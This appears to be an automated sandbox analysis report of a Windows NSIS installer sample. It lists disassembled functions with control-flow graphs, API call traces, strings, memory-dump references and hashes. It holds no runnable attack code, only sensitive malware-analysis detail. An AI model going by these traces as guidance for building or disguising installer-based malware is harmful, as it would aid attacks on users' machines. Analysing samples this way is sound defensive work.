                                      • Instruction Fuzzy Hash: FA61E6716442007EE710BB659C85F373AACEB8275AF00857EFA45B22E2D67D6D01CB2D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403FD0 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 205windowstringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 448 403fd0-403fe0 449 4040f2-404105 448->449 450 403fe6-403fee 448->450 451 404161-404165 449->451 452 404107-404110 449->452 453 403ff0-403fff 450->453 454 404001-404099 call 403e87 * 2 CheckDlgButton call 403ea9 GetDlgItem call 403ebc SendMessageA 450->454 455 404235-40423c 451->455 456 40416b-40417f GetDlgItem 451->456 457 404244 452->457 458 404116-40411e 452->458 453->454 486 4040a4-4040ed SendMessageA * 2 lstrlenA SendMessageA * 2 454->486 487 40409b-40409e GetSysColor 454->487 455->457 463 40423e 455->463 460 404181-404188 456->460 461 4041f3-4041fa 456->461 464 404247-40424e call 403eee 457->464 458->457 462 404124-404130 458->462 460->461 466 40418a-4041a5 460->466 461->464 467 4041fc-404203 461->467 462->457 468 404136-40415c GetDlgItem SendMessageA call 403ea9 call 40425a 462->468 463->457 471 404253-404257 464->471 466->461 473 4041a7-4041f0 SendMessageA LoadCursorA SetCursor ShellExecuteA LoadCursorA SetCursor 466->473 467->464 474 404205-404209 467->474 468->451 473->461 477 40420b-40421a SendMessageA 474->477 478 40421c-404220 474->478 477->478 481 404230-404233 478->481 482 404222-40422e SendMessageA 478->482 481->471 482->481 486->471 487->486
                                      APIs
                                      • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040405B
                                      • GetDlgItem.USER32(00000000,000003E8), ref: 0040406F
                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040408D
                                      • GetSysColor.USER32(?), ref: 0040409E
                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040AD
                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040BC
                                      • lstrlenA.KERNEL32(?), ref: 004040BF
                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040CE
                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040E3
                                      • GetDlgItem.USER32(?,0000040A), ref: 00404145
                                      • SendMessageA.USER32(00000000), ref: 00404148
                                      • GetDlgItem.USER32(?,000003E8), ref: 00404173
                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041B3
                                      • LoadCursorA.USER32(00000000,00007F02), ref: 004041C2
                                      • SetCursor.USER32(00000000), ref: 004041CB
                                      • ShellExecuteA.SHELL32(0000070B,open,007A16A0,00000000,00000000,00000001), ref: 004041DE
                                      • LoadCursorA.USER32(00000000,00007F00), ref: 004041EB
                                      • SetCursor.USER32(00000000), ref: 004041EE
                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040421A
                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040422E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                      • String ID: N$open
                                      • API String ID: 3615053054-904208323
                                      • Opcode ID: d629206fc8082d4d9534340c1f089e738487a858c59a90b8640b314579ac6490
                                      • Instruction ID: 031dbeac94855a04ab7bc056baf49b9f62a127ba2e136bb98bc4968a945489ce
                                      • Opcode Fuzzy Hash: d629206fc8082d4d9534340c1f089e738487a858c59a90b8640b314579ac6490
                                      • Instruction Fuzzy Hash: DF61B971A40209BFEB109F60CC45F6A3B69FB84755F10816AFB047B2D1C7B8A951CF99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004031B1 Relevance: 31.7, APIs: 10, Strings: 8, Instructions: 155stringfilecomCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 488 4031b1-4031b5 488->488 489 4031b7-403264 call 40564f 488->489 494 403266 489->494 495 403267-40326b 489->495 494->495 496 403271-403305 GetTempPathA call 4030bb DeleteFileA call 402c33 495->496 497 4031ac-4031af 495->497 504 40330a-403310 496->504 505 403305 call 402c33 496->505 497->489 506 4033a4-4033b3 call 403548 OleUninitialize 504->506 507 403316-40331c 504->507 505->504 516 4033b9-4033c9 call 4053a8 ExitProcess 506->516 517 4034ad-4034b3 506->517 508 403394-4033a0 call 403622 507->508 509 40331e-403329 call 40564f 507->509 508->506 520 40332b-403354 509->520 521 40335f-403369 509->521 518 403530-403538 517->518 519 4034b5-4034d2 call 405ea2 * 3 517->519 524 40353a 518->524 525 40353e-403542 ExitProcess 518->525 550 4034d4-4034d6 519->550 551 40351c-403527 ExitWindowsEx 519->551 526 403356-403358 520->526 527 40336b-403378 call 405712 521->527 528 4033cf-4033e9 lstrcatA lstrcmpiA 521->528 524->525 526->521 531 40335a-40335d 526->531 527->506 540 40337a-403390 call 405b77 * 2 527->540 528->506 533 4033eb-403400 CreateDirectoryA SetCurrentDirectoryA 528->533 531->521 531->526 536 403402-403408 call 405b77 533->536 537 40340d-403435 call 405b77 533->537 536->537 546 40343b-403457 call 405b99 DeleteFileA 537->546 540->508 556 403498-40349f 546->556 557 403459-403469 CopyFileA 546->557 550->551 555 4034d8-4034da 550->555 551->518 554 403529-40352b call 40140b 551->554 554->518 555->551 559 4034dc-4034ee GetCurrentProcess 555->559 556->546 560 4034a1-4034a8 call 405a2b 556->560 557->556 561 40346b-40348b call 405a2b call 405b99 call 405347 557->561 559->551 565 4034f0-403512 559->565 560->506 561->556 573 40348d-403494 CloseHandle 561->573 565->551 573->556
                                      APIs
                                      • GetTempPathA.KERNEL32(00000400,007A9400,00000000,00000020), ref: 00403295
                                      • GetWindowsDirectoryA.KERNEL32(007A9400,000003FB), ref: 004032A6
                                      • lstrcatA.KERNEL32(007A9400,\Temp), ref: 004032B2
                                      • GetTempPathA.KERNEL32(000003FC,007A9400,007A9400,\Temp), ref: 004032C6
                                      • lstrcatA.KERNEL32(007A9400,Low), ref: 004032CE
                                      • SetEnvironmentVariableA.KERNEL32(TEMP,007A9400,007A9400,Low), ref: 004032DF
                                      • SetEnvironmentVariableA.KERNEL32(TMP,007A9400), ref: 004032E7
                                      • DeleteFileA.KERNEL32(007A9000), ref: 004032FB
                                        • Part of subcall function 00405B77: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B84
                                      • OleUninitialize.OLE32(?), ref: 004033A9
                                      • ExitProcess.KERNEL32 ref: 004033C9
                                      • lstrcatA.KERNEL32(007A9400,~nsu.tmp,?,?,?), ref: 004033D5
                                      • lstrcmpiA.KERNEL32(007A9400,007A8C00), ref: 004033E1
                                      • CreateDirectoryA.KERNEL32(007A9400,?,?,?,?), ref: 004033ED
                                      • SetCurrentDirectoryA.KERNEL32(007A9400,?,?,?,?), ref: 004033F4
                                      • DeleteFileA.KERNEL32(0079D8B8,0079D8B8,?,007A3000,?,?,?,?,?), ref: 0040344D
                                      • CopyFileA.KERNEL32(007A9C00,0079D8B8,00000001), ref: 00403461
                                      • CloseHandle.KERNEL32(00000000,0079D8B8,0079D8B8,?,0079D8B8,?,?,?,?,?), ref: 0040348E
                                      • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004034E3
                                      • ExitWindowsEx.USER32(00000002), ref: 0040351F
                                      • ExitProcess.KERNEL32 ref: 00403542
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: DirectoryExitFileProcesslstrcat$CurrentDeleteEnvironmentPathTempVariableWindows$CloseCopyCreateHandleUninitializelstrcmpilstrcpyn
                                      • String ID: $"$Error launching installer$Low$TEMP$TMP$\Temp$tvSU*#
                                      • API String ID: 5229609-2506149738
                                      • Opcode ID: 6a086e958b52bcf3b227f1b0a813edfeaa15eb1004a87bd095f96dbeb3b99093
                                      • Instruction ID: 143e6c1386cc77476d4f0e3e613a74925a80f8b86bd32943e9bd82241226e28c
                                      • Opcode Fuzzy Hash: 6a086e958b52bcf3b227f1b0a813edfeaa15eb1004a87bd095f96dbeb3b99093
                                      • Instruction Fuzzy Hash: EC510A30A0869259E7256F355C5DA3B7FE99B82307F0844BFE092762E3C67C4A05CB5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040589D Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 141filestringmemoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 574 40589d-4058c4 lstrcpyA 575 4058c6-4058de call 405825 CloseHandle GetShortPathNameA 574->575 576 4058ec-4058fb GetShortPathNameA 574->576 579 405a25-405a2a 575->579 582 4058e4-4058e6 575->582 578 405901-405903 576->578 576->579 578->579 581 405909-405947 wsprintfA call 405b99 call 405825 578->581 581->579 587 40594d-405969 GetFileSize GlobalAlloc 581->587 582->576 582->579 588 405a1e-405a1f CloseHandle 587->588 589 40596f-405981 ReadFile 587->589 588->579 589->588 590 405987-40598b 589->590 590->588 591 405991-40599e call 40578a 590->591 594 4059a0-4059b2 lstrcpyA 591->594 595 4059b4-4059c6 call 40578a 591->595 596 4059e9 594->596 600 4059e5 595->600 601 4059c8-4059ce 595->601 599 4059eb-405a18 call 4057e0 SetFilePointer WriteFile GlobalFree 596->599 599->588 600->596 603 4059d6-4059d8 601->603 605 4059d0-4059d5 603->605 606 4059da-4059e3 603->606 605->603 606->599
                                      APIs
                                      • lstrcpyA.KERNEL32(007A0A88,NUL,00000000,00000000,?,?,?,00405A53,?,?,00000001,0040169A,00000000,00000000,00000000), ref: 004058AD
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,?,00405A53,?,?,00000001,0040169A,00000000,00000000,00000000), ref: 004058D1
                                      • GetShortPathNameA.KERNEL32(?,007A0A88,00000400), ref: 004058DA
                                        • Part of subcall function 0040578A: lstrlenA.KERNEL32(0040599C,?,00000000,00000000,?,00000000,0040599C,00000000,[Rename]), ref: 0040579A
                                        • Part of subcall function 0040578A: lstrlenA.KERNEL32(00000000,?,00000000,0040599C,00000000,[Rename]), ref: 004057CC
                                      • GetShortPathNameA.KERNEL32(?,007A0E88,00000400), ref: 004058F7
                                      • wsprintfA.USER32 ref: 00405915
                                      • GetFileSize.KERNEL32(00000000,00000000,007A0E88,C0000000,00000004,007A0E88,?), ref: 00405950
                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 0040595F
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405979
                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 004059A9
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,007A0688,00000000,-0000000A,0040936C,00000000,[Rename]), ref: 004059FF
                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405A11
                                      • GlobalFree.KERNEL32(00000000), ref: 00405A18
                                      • CloseHandle.KERNEL32(00000000), ref: 00405A1F
                                        • Part of subcall function 00405825: GetFileAttributesA.KERNEL32(00000003,00402C73,007A9C00,80000000,00000003), ref: 00405829
                                        • Part of subcall function 00405825: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040584B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                      • String ID: %s=%s$NUL$[Rename]
                                      • API String ID: 3756836283-4148678300
                                      • Opcode ID: 3dc5f7bb7184485a7b87fb4c129ebc8997b7fd1a3a4ee1b2d00c5489aec53c8d
                                      • Instruction ID: 703081f9f45e0959c07b6a00457515c8324f77790511a56e8ac0345a7c84fdf8
                                      • Opcode Fuzzy Hash: 3dc5f7bb7184485a7b87fb4c129ebc8997b7fd1a3a4ee1b2d00c5489aec53c8d
                                      • Instruction Fuzzy Hash: 91412B71B04705AFD2206B249C49F6B7B6CEF89754F14053AFD01F62D2D678A8008EBD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                      • BeginPaint.USER32(?,?), ref: 00401047
                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                      • DeleteObject.GDI32(?), ref: 004010ED
                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                      • DrawTextA.USER32(00000000,007A1F00,000000FF,00000010,00000820), ref: 00401156
                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                      • DeleteObject.GDI32(?), ref: 00401165
                                      • EndPaint.USER32(?,?), ref: 0040116E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                      • String ID: F
                                      • API String ID: 941294808-1304234792
                                      • Opcode ID: 98e14e1640eb646ee3811aa623ba2e5d1e9cc6367b1deba79bcf05c34458357a
                                      • Instruction ID: dd0e79dd03d73333c37d03741989dce367d08c72bd534bd23d7a1991bc4c48e1
                                      • Opcode Fuzzy Hash: 98e14e1640eb646ee3811aa623ba2e5d1e9cc6367b1deba79bcf05c34458357a
                                      • Instruction Fuzzy Hash: E5419A71804249AFCB058F95CD459BFBFB9FF45310F00812AF962AA1A0C738EA51DFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004042C5 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 268stringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 619 4042c5-4042ef 620 4042f1-4042fd call 40538c call 405de2 619->620 621 404302-40430c 619->621 620->621 623 40437a-404381 621->623 624 40430e-404324 GetDlgItem call 405691 621->624 625 404387-404390 623->625 626 404458-40445f 623->626 639 404336-40436f SetWindowTextA call 403e87 * 2 call 403ebc call 405ea2 624->639 640 404326-40432e call 4056bd 624->640 629 404392-40439d 625->629 630 4043aa-4043af 625->630 631 404461-404468 626->631 632 40446e-404489 call 40538c call 405712 626->632 635 4045f2-404604 call 403eee 629->635 636 4043a3 629->636 630->626 637 4043b5-4043f7 call 405b99 SHBrowseForFolderA 630->637 631->632 631->635 658 404492-4044ab call 405b77 call 405ea2 632->658 659 40448b 632->659 636->630 652 404451 637->652 653 4043f9-404413 CoTaskMemFree call 405624 637->653 639->635 675 404375-404377 639->675 640->639 651 404330-404331 call 405624 640->651 651->639 652->626 664 404415-40441b 653->664 665 40443d-40444f SetDlgItemTextA 653->665 676 4044e0-4044ef call 405b77 call 4056bd 658->676 677 4044ad-4044b1 658->677 659->658 664->665 668 40441d-404434 call 405b99 lstrcmpiA 664->668 665->626 668->665 679 404436-404438 lstrcatA 668->679 675->623 690 4044f1 676->690 691 4044f4-40450d GetDiskFreeSpaceA 676->691 677->676 680 4044b3-4044c5 677->680 679->665 684 404531-404552 680->684 685 4044c7-4044c9 680->685 687 404557 684->687 688 4044cb 685->688 689 4044cd-4044de call 40566b 685->689 692 40455c-404568 call 404722 687->692 688->689 689->676 689->680 690->691 694 404554 691->694 695 40450f-40452f MulDiv 691->695 699 404575-40457e 692->699 700 40456a-40456c 692->700 694->687 695->692 702 404580-404590 call 40466d 699->702 703 4045ab-4045b5 699->703 700->699 701 40456e 700->701 701->699 713 404592-40459b call 40466d 702->713 714 40459d-4045a6 SetDlgItemTextA 702->714 704 4045c1-4045c7 703->704 705 4045b7-4045be call 40140b 703->705 708 4045c9 704->708 709 4045cc-4045dd call 403ea9 704->709 705->704 708->709 717 4045ec 709->717 718 4045df-4045e5 709->718 713->703 714->703 717->635 718->717 720 4045e7 call 40425a 718->720 720->717
                                      APIs
                                      • GetDlgItem.USER32(?,000003FB), ref: 00404314
                                      • SetWindowTextA.USER32(00000000,?), ref: 0040433E
                                      • SHBrowseForFolderA.SHELL32(?,0079E0D0,?), ref: 004043EF
                                      • CoTaskMemFree.OLE32(00000000), ref: 004043FA
                                      • lstrcmpiA.KERNEL32(007A16A0,0079ECF8), ref: 0040442C
                                      • lstrcatA.KERNEL32(?,007A16A0), ref: 00404438
                                      • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040444A
                                        • Part of subcall function 0040538C: GetDlgItemTextA.USER32(?,?,00000400,00404481), ref: 0040539F
                                        • Part of subcall function 00405DE2: CharNextA.USER32(?,*?|<>/":,00000000,007A8000,007A9400,007A9400,00000000,004030C7,007A9400,75EE3410,0040329C), ref: 00405E3A
                                        • Part of subcall function 00405DE2: CharNextA.USER32(?,?,?,00000000), ref: 00405E47
                                        • Part of subcall function 00405DE2: CharNextA.USER32(?,007A8000,007A9400,007A9400,00000000,004030C7,007A9400,75EE3410,0040329C), ref: 00405E4C
                                        • Part of subcall function 00405DE2: CharPrevA.USER32(?,?,007A9400,007A9400,00000000,004030C7,007A9400,75EE3410,0040329C), ref: 00405E5C
                                      • GetDiskFreeSpaceA.KERNEL32(0079DCC8,?,?,0000040F,?,0079DCC8,0079DCC8,?,00000000,0079DCC8,?,?,000003FB,?), ref: 00404505
                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404520
                                      • SetDlgItemTextA.USER32(00000000,00000400,0079DCB8), ref: 004045A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                      • String ID: A
                                      • API String ID: 2246997448-3554254475
                                      • Opcode ID: 9395c303e37b59eae5547e4d4be03b44725026b6b580d2a1fc6fc9bc52966496
                                      • Instruction ID: 03cdc0df629eda19bc81850558ffdd0616f3ff49271ebeceec1b5cb03d6b2ac4
                                      • Opcode Fuzzy Hash: 9395c303e37b59eae5547e4d4be03b44725026b6b580d2a1fc6fc9bc52966496
                                      • Instruction Fuzzy Hash: DB9192B1900208BBDB11AFA1CC81AAF77B8EF85305F14447BFB01B62D1D77C9A418B69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405B99 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 199stringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 722 405b99-405ba4 723 405ba6-405bb5 722->723 724 405bb7-405bcc 722->724 723->724 725 405bd2-405bdd 724->725 726 405dbf-405dc3 724->726 725->726 727 405be3-405bea 725->727 728 405dc9-405dd3 726->728 729 405bef-405bf9 726->729 727->726 731 405dd5-405dd9 call 405b77 728->731 732 405dde-405ddf 728->732 729->728 730 405bff-405c06 729->730 733 405db2 730->733 734 405c0c-405c41 730->734 731->732 736 405db4-405dba 733->736 737 405dbc-405dbe 733->737 738 405c47-405c52 GetVersion 734->738 739 405d5c-405d5f 734->739 736->726 737->726 740 405c54-405c58 738->740 741 405c6c 738->741 742 405d61-405d64 739->742 743 405d8f-405d92 739->743 740->741 746 405c5a-405c5e 740->746 749 405c73-405c7a 741->749 747 405d74-405d80 call 405b77 742->747 748 405d66-405d72 call 405ad5 742->748 744 405da0-405db0 lstrlenA 743->744 745 405d94-405d9b call 405b99 743->745 744->726 745->744 746->741 751 405c60-405c64 746->751 760 405d85-405d8b 747->760 748->760 753 405c7c-405c7e 749->753 754 405c7f-405c81 749->754 751->741 756 405c66-405c6a 751->756 753->754 758 405c83-405ca6 call 405a5e 754->758 759 405cba-405cbd 754->759 756->749 771 405d43-405d47 758->771 772 405cac-405cb5 call 405b99 758->772 761 405ccd-405cd0 759->761 762 405cbf-405ccb GetSystemDirectoryA 759->762 760->744 764 405d8d 760->764 766 405cd2-405ce0 GetWindowsDirectoryA 761->766 767 405d3a-405d3c 761->767 765 405d3e-405d41 762->765 769 405d54-405d5a call 405de2 764->769 765->769 765->771 766->767 767->765 770 405ce2-405cec 767->770 769->744 777 405d06-405d1c SHGetSpecialFolderLocation 770->777 778 405cee-405cf1 770->778 771->769 775 405d49-405d4f lstrcatA 771->775 772->765 775->769 781 405d37 777->781 782 405d1e-405d35 SHGetPathFromIDListA CoTaskMemFree 777->782 778->777 780 405cf3-405d04 778->780 780->765 780->777 781->767 782->765 782->781
                                      APIs
                                      • GetVersion.KERNEL32(?,0079E4D8,00000000,00404EBC,0079E4D8,?), ref: 00405C4A
                                      • GetSystemDirectoryA.KERNEL32(007A16A0,00000400), ref: 00405CC5
                                      • GetWindowsDirectoryA.KERNEL32(007A16A0,00000400), ref: 00405CD8
                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405D14
                                      • SHGetPathFromIDListA.SHELL32(?,007A16A0), ref: 00405D22
                                      • CoTaskMemFree.OLE32(?), ref: 00405D2D
                                      • lstrcatA.KERNEL32(007A16A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D4F
                                      • lstrlenA.KERNEL32(007A16A0,?,0079E4D8,00000000,00404EBC,0079E4D8,?), ref: 00405DA1
                                      Strings
                                      • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00405D49
                                      • ., xrefs: 00405C60
                                      • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405C94
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                      • String ID: .$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                      • API String ID: 900638850-3562769014
                                      • Opcode ID: eaa8d679cdde7ec1b846b7d20550e8a9090a2d3d3f7a51f3022e8c133c3e6eb0
                                      • Instruction ID: 050506686e60d08a76f5c318217997e75ce046d50ca6fca7f220fc6f31a13d77
                                      • Opcode Fuzzy Hash: eaa8d679cdde7ec1b846b7d20550e8a9090a2d3d3f7a51f3022e8c133c3e6eb0
                                      • Instruction Fuzzy Hash: 5E61F471A04A05AAEF115F24CC88BBF3BA9EF52314F14813BE941BA2D1D27C5981DF5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004030EF Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 76comCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 784 4030ef-4031a7 #17 SetErrorMode OleInitialize call 405ea2 SHGetFileInfoA call 405b77 GetCommandLineA call 405b77 GetModuleHandleA call 40564f CharNextA 794 403267-40326b 784->794 795 403271-403305 GetTempPathA call 4030bb DeleteFileA call 402c33 794->795 796 4031ac-403264 call 40564f 794->796 809 40330a-403310 795->809 810 403305 call 402c33 795->810 796->794 808 403266 796->808 808->794 811 4033a4-4033b3 call 403548 OleUninitialize 809->811 812 403316-40331c 809->812 810->809 821 4033b9-4033c9 call 4053a8 ExitProcess 811->821 822 4034ad-4034b3 811->822 813 403394-4033a0 call 403622 812->813 814 40331e-403329 call 40564f 812->814 813->811 825 40332b-403354 814->825 826 40335f-403369 814->826 823 403530-403538 822->823 824 4034b5-4034d2 call 405ea2 * 3 822->824 829 40353a 823->829 830 40353e-403542 ExitProcess 823->830 855 4034d4-4034d6 824->855 856 40351c-403527 ExitWindowsEx 824->856 831 403356-403358 825->831 832 40336b-403378 call 405712 826->832 833 4033cf-4033e9 lstrcatA lstrcmpiA 826->833 829->830 831->826 836 40335a-40335d 831->836 832->811 845 40337a-403390 call 405b77 * 2 832->845 833->811 838 4033eb-403400 CreateDirectoryA SetCurrentDirectoryA 833->838 836->826 836->831 841 403402-403408 call 405b77 838->841 842 40340d-403435 call 405b77 838->842 841->842 851 40343b-403457 call 405b99 DeleteFileA 842->851 845->813 861 403498-40349f 851->861 862 403459-403469 CopyFileA 851->862 855->856 860 4034d8-4034da 855->860 856->823 859 403529-40352b call 40140b 856->859 859->823 860->856 864 4034dc-4034ee GetCurrentProcess 860->864 861->851 865 4034a1-4034a8 call 405a2b 861->865 862->861 866 40346b-40348b call 405a2b call 405b99 call 405347 862->866 864->856 870 4034f0-403512 864->870 865->811 866->861 878 40348d-403494 CloseHandle 866->878 870->856 878->861
                                      APIs
                                      • #17.COMCTL32 ref: 00403110
                                      • SetErrorMode.KERNEL32(00008001), ref: 0040311B
                                      • OleInitialize.OLE32(00000000), ref: 00403122
                                        • Part of subcall function 00405EA2: GetModuleHandleA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EB4
                                        • Part of subcall function 00405EA2: LoadLibraryA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EBF
                                        • Part of subcall function 00405EA2: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED0
                                      • SHGetFileInfoA.SHELL32(0079DCB8,00000000,?,00000160,00000000,00000008), ref: 0040314A
                                        • Part of subcall function 00405B77: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B84
                                      • GetCommandLineA.KERNEL32(007A1F00,NSIS Error), ref: 0040315F
                                      • GetModuleHandleA.KERNEL32(00000000,007A8000,00000000), ref: 00403172
                                      • CharNextA.USER32(00000000,007A8000,00000020), ref: 0040319D
                                      • GetTempPathA.KERNEL32(00000400,007A9400,00000000,00000020), ref: 00403295
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: HandleModule$AddressCharCommandErrorFileInfoInitializeLibraryLineLoadModeNextPathProcTemplstrcpyn
                                      • String ID: $NSIS Error
                                      • API String ID: 3130561831-3882934480
                                      • Opcode ID: 783531bee77386b6c5f7799fe16efcc6e6d2b48535e64221b1f7caff5671a898
